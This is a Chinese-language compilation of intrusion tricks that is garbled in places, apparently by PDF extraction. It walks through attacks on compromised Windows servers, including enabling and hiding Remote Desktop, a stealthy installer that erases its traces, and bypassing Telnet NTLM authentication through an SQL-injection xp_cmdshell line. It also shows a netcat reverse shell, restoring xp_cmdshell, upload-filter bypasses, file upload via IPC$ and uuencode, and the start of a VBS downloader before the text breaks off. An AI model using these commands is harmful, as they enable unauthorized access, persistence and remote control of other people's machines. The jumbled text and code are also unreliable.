入侵過程中小技巧總結(jié).

1、查看 3389 端口總結(jié)tsport.reg一、導出注冊表法regedit /e"HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp"然后 type tsport.reg | find "PortNumber"結(jié)果如果是 d3d 的話就證明是 3389 端口 如果是其他的 轉(zhuǎn)換成 10 進制就可以了。二、腳本利用法Dim ReadComputerNameSet ReadComputerName=WScript.CreateObject(&quo

2、t;WScript.Shell") Dim TSName,TSRegPathTSRegPath="HKLMSystemCurrentControlSetControlTerminal ServerWinStationsRDP-TcpPortNumber"TSName=ReadComputerName.RegRead(TSRegPath) WScript.Echo(" 終端端口為 "&TSName) WScript.Echo()")WScript.Echo(" 本程序是幫助你找到終端的端口 WScript.Echo(&

3、quot;http:/Www.HackPixy.Com&qu. WScript.Echo("Pixy")把以上代碼保存為 vbs 文件，如“ 3389port.vbs ”然后在命令行下運行 cscript 3389port.vbs 即可查看終端端口（桌面環(huán)境下可直接點擊查 看）。三、ASP實現(xiàn)法sub get_terminal_port() terminal_port_path="HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp" t

4、erminal_port_key="PortNumber" termport=wsh.regread(terminal_port_path&terminal_port_key)if termport="" or err.number<>0 then response.write " else response.write " end if無法得到終端服務(wù)端口。請檢查權(quán)限是否已經(jīng)受到限制。當前終端服務(wù)端口 : "&termport&"<br>"<br&g

5、t;"end sub四、利用工具C3389.exe開啟 XP And 2003 終端的方法xp 、 2003 開終端的方法和 2000、 nt (ts version )不一樣，不是通過安裝，因為 xp、 2003 已經(jīng)自動安裝的遠程桌面功能，只是啟動不啟動的問題。通過下面這個批處理就能在命令行下激活xp、 2003 的遠程桌面功能echo windows registry editor version 5.00>>3389.regecho hkey_local_machinesystemcurrentcontrolsetcontrolterminal server>

6、;>3389.regecho "fdenytsconnections"=dword:00000000>>3389.regecho hkey_local_machinesystemcurrentcontrolsetcontrolterminal serverwdsrdpwdtdstcp>>3389.regecho "portnumber"=dword:00000d3d>>3389.regecho hkey_local_machinesystemcurrentcontrolsetcontrolterminal ser

7、verwinstationsrdp-tcp>>3389.regecho "portnumber"=dword:00000d3d>>3389.regregedit /s 3389.regdel 3389.reg修改 3389 端口方法(修改后不易被掃出) 修改服務(wù)器端的端口設(shè)置 ,注冊表有 2 個地方需要修改HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminalServerWdsrd pwdTdstcpPortNumber 值，默認是 3389，修改成所希望的端口，比如6000第二個地方：HKE

8、Y_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-TcpPortNumber 值，默認是 3389，修改成所希望的端口，比如6000現(xiàn)在這樣就可以了。重啟系統(tǒng)就可以了打開 3389端口的 5 種方法怎么樣開 3389端口，這里我把他們總結(jié)一下，很全面 , 希望對你有用 :1，打開記事本，編輯內(nèi)容如下：echo Components > c:sqlwinnt 是否在 c 盤，echo TSEnable = on >> c:sql sysocmgr /i:c:winntinfsys

9、oc.inf /u:c:sql /q 編輯好后存為BAT文件，上傳至肉雞，執(zhí)行。這里值得注意的是要確定 如果在其他盤則需要改動。2 （ 對 xp2000 都有效 ） 腳本文件 本地開 3389 工具 :rots1.05 使用方法： 在命令行方式下使用 windows 自帶的腳本宿主程序 cscript.exe 調(diào)用腳本,例如：c:>cscript ROTS.vbs < 目標 IP> <用戶名 > <密碼> 服務(wù)端口 自動重起選項 服務(wù)端口： 設(shè)置終端服務(wù)的服務(wù)端口。默認是3389。自動重起選項：使用/r表示安裝完成后自動重起目標使設(shè)置生效。使用 /fr

10、 表示強制重起目標。 （如果 /r 不行,可以試試這個） 使用此參數(shù)時,端口設(shè)置不能忽略。比如掃描到了一個有 NT 弱口令的服務(wù)器， IP 地址是 22 ，管理員帳戶是 administrator ，密碼為空運行CM（2000下的DOS,我們給它開終端！命令如下！cscript reg.vbe 22 administrator "" 3389 /fr上面的命令應(yīng)該可以理解吧？cscript reg.vbe這是命令，后面的是IP，然后是管理員帳戶,接這是密碼, 因為 22 這臺服務(wù)器的管理員密碼是空

11、的, 那就用雙引號表示為 空,再后面是端口,你可以任意設(shè)置終端的端口,/fr 是重啟命令（強制重啟,一般我都用這個,你也可以 /r ,這是普通重啟） 腳本會判斷目標系統(tǒng)類型，如果不是 server 及以上版本，就會提示你是否要取消。 因為 pro 版不能安裝終端服務(wù)。如果你確信腳本判斷錯誤，就繼續(xù)安裝好了。如果要對本地使用， IP 地址為 或者一個點（用 . 表示），用戶名和密碼都為空（用 "" 表示）。腳本訪問的目標的135端口，如果目標135端口未開放，或者 WMI服務(wù)關(guān)閉，那么腳本就沒 用了。3，下載 3389 自動安裝程序 -djshao 正式版

12、 5.0說明：解壓 djshao5.0.zip, 用你的隨便什么方法把把解壓出來的 djxyxs.exe 上傳到肉雞的 c:winnttemp 下， 然后進入 c:winnttemp 目錄執(zhí)行 djxyxs.exe 解壓縮文件， 然后再執(zhí)行 解壓縮出來的 azzd.exe 文件，等一會肉雞會自動重啟！重啟后會出現(xiàn)終端服務(wù)！特點： 1、不用修改注冊表的安裝路徑， 注冊表會自動修改， 安裝完后會自動恢復到原來的安 裝路徑， 2、在后臺安靜模式運行，就算肉雞旁有人也沒有關(guān)系！3、在添加和刪除中看不出終端服務(wù)被安裝的痕跡，也就是啟動終端前不會打鉤，4、不會在肉雞上留下你的上傳文件，7、8、自在安裝完終

13、端服務(wù)后會會自動刪除你上傳到 c:winnttemp 下的任何文件！ 5、不管肉雞的 winnt 裝在什么盤上都無所謂！ 6、安裝完終端后會刪除在管理工具中的終端快捷圖標！ 在沒有安裝終端前，終端服務(wù)是被禁止的！安裝終端后，終端服務(wù)被改為自動！但是如果在 安裝前終端服務(wù)是手動！安裝后就可能還是手動！等重啟后就不會打開服務(wù)！所以在軟件中 加了 sc 指令，等安裝完后，不管終端服務(wù)是禁止還是手動還是自動，全部改為自動。 動檢測肉雞是不是服務(wù)器版，如果不是刪除原文件，不執(zhí)行安裝，如果是服務(wù)器版就執(zhí)行安 裝！ 9、支持中日韓繁四個版本的 win2000 服務(wù)器版！5，下載 DameWare NT Ut

14、ilities 注冊版安裝注冊完畢后輸入對方 IP 用戶名密碼，等待出現(xiàn)是否安裝的對話框點是。 復制啟動后出現(xiàn)對方桌面。找到終端在對方桌面進入控制面版， 點添加或刪除程序。 進入后點添加 /刪除 windows 組件， 服務(wù)，點際進入后在啟動終端服務(wù)上打上勾。確定自動提示重起，重起后 OK終端服務(wù)器超出了最大允許連接數(shù)的解決辦法1、首先你可以 telnet 到此主機上 （ 不管你用哪種方法 ） ，當然如果能直接操作機器更好，不 過直接操作就不必用命令行了，用控制臺更直觀，這里不是我們講述的問題，略過。2、Telnet 上去后 , 先看登陸的用戶： 輸入命令： query use

15、r 系統(tǒng)返回：運行中 . 2004-10-09 15:37 運行中 . 2004-10-09 15:37 已斷開 無 2004-10-09 15:37USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME administrator console 0 user1 UserMachine1 1user2 12此時可以看出的可能根我們的不一樣，根據(jù)具體情況而定?？吹絾? ID 0 的用戶是本地登陸的 ,ID 1 和 ID 12 是 3389登陸的用戶 ,前者在運行中，后 者已經(jīng)斷開了 , 但是斷開了仍然占用系統(tǒng)資源和通道，我們要把它踢掉。如下進行操作

16、即可。輸入命令： logoff 12C:>query user / 再看看USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIMEadministrator console 0 user1 UserMachine1 1運行中 . 2004-10-09 15:37 運行中 . 2004-10-09 15:37telnet 功能（這是默認的） ，還可以通過 SqlServer 的 xp_cmdshell master.dbo.xp_cmdshell ' 命令內(nèi)容 ' ，其余可參考第二步。此方 式要求有訪問 xp_cmdshell 的

17、權(quán)限。3、如果服務(wù)器關(guān)閉了 擴展存儲過程，使用格式:mstsc /console /v:IP:終端端口 T 管理對于Tel net的HTLM身份驗證的突破方法總結(jié)By: 獨孤依人 SST對于Tel net的HTLM身份驗證的突破方法常用以下四種方法:1、新建用戶法telnet 對方 ip ，發(fā)現(xiàn)需要 NTLM 身份驗證。我們在自己的電腦里建立一個要登錄的遠程帳號 和密碼都相同的身份為管理員的賬戶。找到c:winntsystem32cmd.exe建立一個快捷方式到桌面。修改cmd的快捷方式屬性為允許其他身份登陸。 然后運行桌面上的 cmd.exe 的快捷方式。 輸入剛才新建的帳號和密碼， tel

18、net 對方 ip ，直接可以登陸對方電腦了。 這種方法我以前常用的，實用性較強2、命令法那就是直接運行命令:tlntadmn config sec = -ntlm注射的話可以直接運行:;exec master.dbo.xp_cmdshell運行以后就去掉了該死的 ntlm 認證:）'tlntadmn config sec = -ntlm'-3、上傳 ntml.exe 法這種方法有很多缺點，比如:對方有殺毒軟件，網(wǎng)段屏蔽了TFTP等等.4、 telnet 配置信息寫入法直接寫入 telnet 的配置信息到文本中然后在用 shell 執(zhí)行。 這種辦法非常麻煩。對于Telnet的H

19、TLM身份驗證的突破方法用1或2中方法就可解決!解除 TCP/IP 篩選 的方法總結(jié)TCP/IP 篩選在注冊表里有三處，分別是:HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesTcpipHKEY_LOCAL_MACHINESYSTEMControlSet002ServicesTcpipHKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTcpip分別用regedit -e D:a.reg HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTcpip reged

20、it -e D:b.reg HKEY_LOCAL_MACHINESYSTEMControlSet002ServicesTcpip regedit -e D:c.reg HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTcpip 命令來導出注冊表項然 后 把 三 個 文 件 里 的 EnableSecurityFilters"=dword:00000001 EnableSecurityFilters"=dword:00000000改成再將以上三個文件分別用 regedit -s D:a.reg regedit -s D:b.r

21、eg regedit -s D:c.reg 導入注冊表即可附:解除 TCP/IP 限制的小技巧作者:河馬史詩 1.用NC反彈得到一個shell本機監(jiān)聽 NC -l -p 32WEBSHEL運行:x:xxxserv-u.exe "x:xxxnc.exe -e cmd.exe *.*.*.* port"得到一個 shell2.CMD下導出注冊表文件C:>regedit -e x:xxx1.reg HKEY_LOCAL_MACHINESYSTEMControlSet001Ser vicesTcpipC:>regedit-eHKEY_LOCAL_MACHINESYSTE

22、MControlSet002ServicesTcpipx:xxx2.regC:>regedit-eHKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTcpipx:xxx3.reg修改各文件 EnableSecurityFilters將最后的 1 改為 03. 將注冊表文件導入 x:xxx>regedit -s 1.regx:xxx>regedit -s 2.reg x:xxx>regedit -s 3.reg -S 為無提示 重啟命令 iisreset /reboot完成 TCP/IP 篩選限制xp_cmdshell 新的

23、恢復辦法 xp_cmdshell 新的恢復辦法 擴展儲存過程被刪除以后可以有很簡單的辦法恢復： 刪除drop procedure sp_addextendedprocdrop procedure sp_oacreateexec sp_dropextendedproc 'xp_cmdshell'恢復dbcc addextendedproc ("sp_oacreate","odsole70.dll") dbcc addextendedproc ("xp_cmdshell","xplog70.dll")這

24、樣可以直接恢復，不用去管 sp_addextendedproc 是不是存在刪除擴展存儲過過程 xp_cmdshell 的語句 : exec sp_dropextendedproc 'xp_cmdshell'恢復 cmdshell 的 sql 語句exec sp_addextendedproc xp_cmdshell ,dllname ='xplog70.dll'開啟 cmdshell 的 sql 語句exec sp_addextendedproc xp_cmdshell ,dllname ='xplog70.dll'判斷存儲擴展是否存在selec

25、t count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell' 返回結(jié)果為 1 就 ok恢復 xp_cmdshellexec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll'select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'返回結(jié)果為 1 就

26、 ok否則上傳 xplog7.0.dllexec master.dbo.addextendedproc 'xp_cmdshell','c:winntsystem32xplog70.dll'堵上 cmdshell 的 sql 語句 sp_dropextendedproc "xp_cmdshel文件上傳方法匯總文件上傳是很早以前的事了，最早那會常用的就是IPC連接，然后一個一個的COPY自從動網(wǎng)upfile 漏洞出來以后，各種腳本系統(tǒng)如 PHPJSP下的文件漏洞紛紛暴出，原理都是大同小異，沒有過濾文件上傳路徑，導致可以抓包然后把空格20改成00,變成空字符

27、 NULL系統(tǒng)是從右往左識別的，所以到空字符那就截斷了，更簡單的就是過濾文件上傳類型不完整，改 后綴就可以解決了,這些上傳文件的漏洞,用萬能上傳工具就可以輕松搞定,不過漏洞文件 名不同罷了。還有一些另類的文件上傳方法, 是在系統(tǒng)做了比較好的防范下完成的, 資料來源感謝 CD-LION 提供一。先COPY個 win shell.exe吧，開個tel net端口，命令行下總比在瀏覽器里方便啊.copy myIPc$toolswinshell.exe d:downloadswinzip32已復制一個文件啟動它 d:downloadswinzip32winshell.exe瀏覽器窗口會停好久 ，不用等

28、的 ，程序已經(jīng)啟動了 ，點停止，接著，斷開共享連接 : net use myIPc$ /del完成1 利用 telnet 上傳文件 by :jiangyf如果 ftp 被關(guān)了 ，sendmail 也不行 ， 如何把編譯好的文件上傳到主機呢 ?方法很簡單 :1. 先把要上傳的文件用 uuedcode 進行編碼 ， 文件會變成大概下面的樣子 : begin 644 file.batM.C!J95T92TP，#503U!=:%=E6#5D9%!>，2Q&1D9&1C$L1D9&，2PT<E!>4%J M95T85!9+7M04%28#!*CTP，'5

29、00D)04%!049+04"4$E$34-"04Q%04I- M3D-"2D%，24%!14U-3D-"1D5'24=&0T%3D="1T1(0T=02$='2DA#2$9(1$-!M1TI(1$-!1T1'4$=.1TI'3T=(0T%#3T-/0T#3T-/0T!3D%+0T5!07%Q<7$M"D!%0TA/($&1B'*0T062'E,"Y"050+T(0SI<0D%45DE2+D-/32'O0B'0E62'

30、;*0SI<0D%45DE2+D-/32'*1$5,($,Z7$)!5%9)4BY#3TT"'' endsum -r/size 17903/262 全部都是可見的 ASCII 字符了2. 用TELNET連接到主機后輸入$ cat >a然后用 WINODW的拷貝/粘貼,把文件粘貼到tel net窗口按y在當前目錄下產(chǎn)生文件 a3. uudecode a文件復原，然后chmod即可3 腳本是非常好的東西，只要把源碼保存到一個文件中就能運行。所以在shell 下，用echo 語句直接寫到一個文件中，在用相應(yīng)的解釋程序執(zhí)行就可以啦。這里是一個程序 實例的簡化 :echo Set xPost = CreateObject("Microsoft.XMLHTTP") >167168.vbsecho xPost.Open "GET"," >>167168.vbs echo xPost.Send() >>167168.vbsech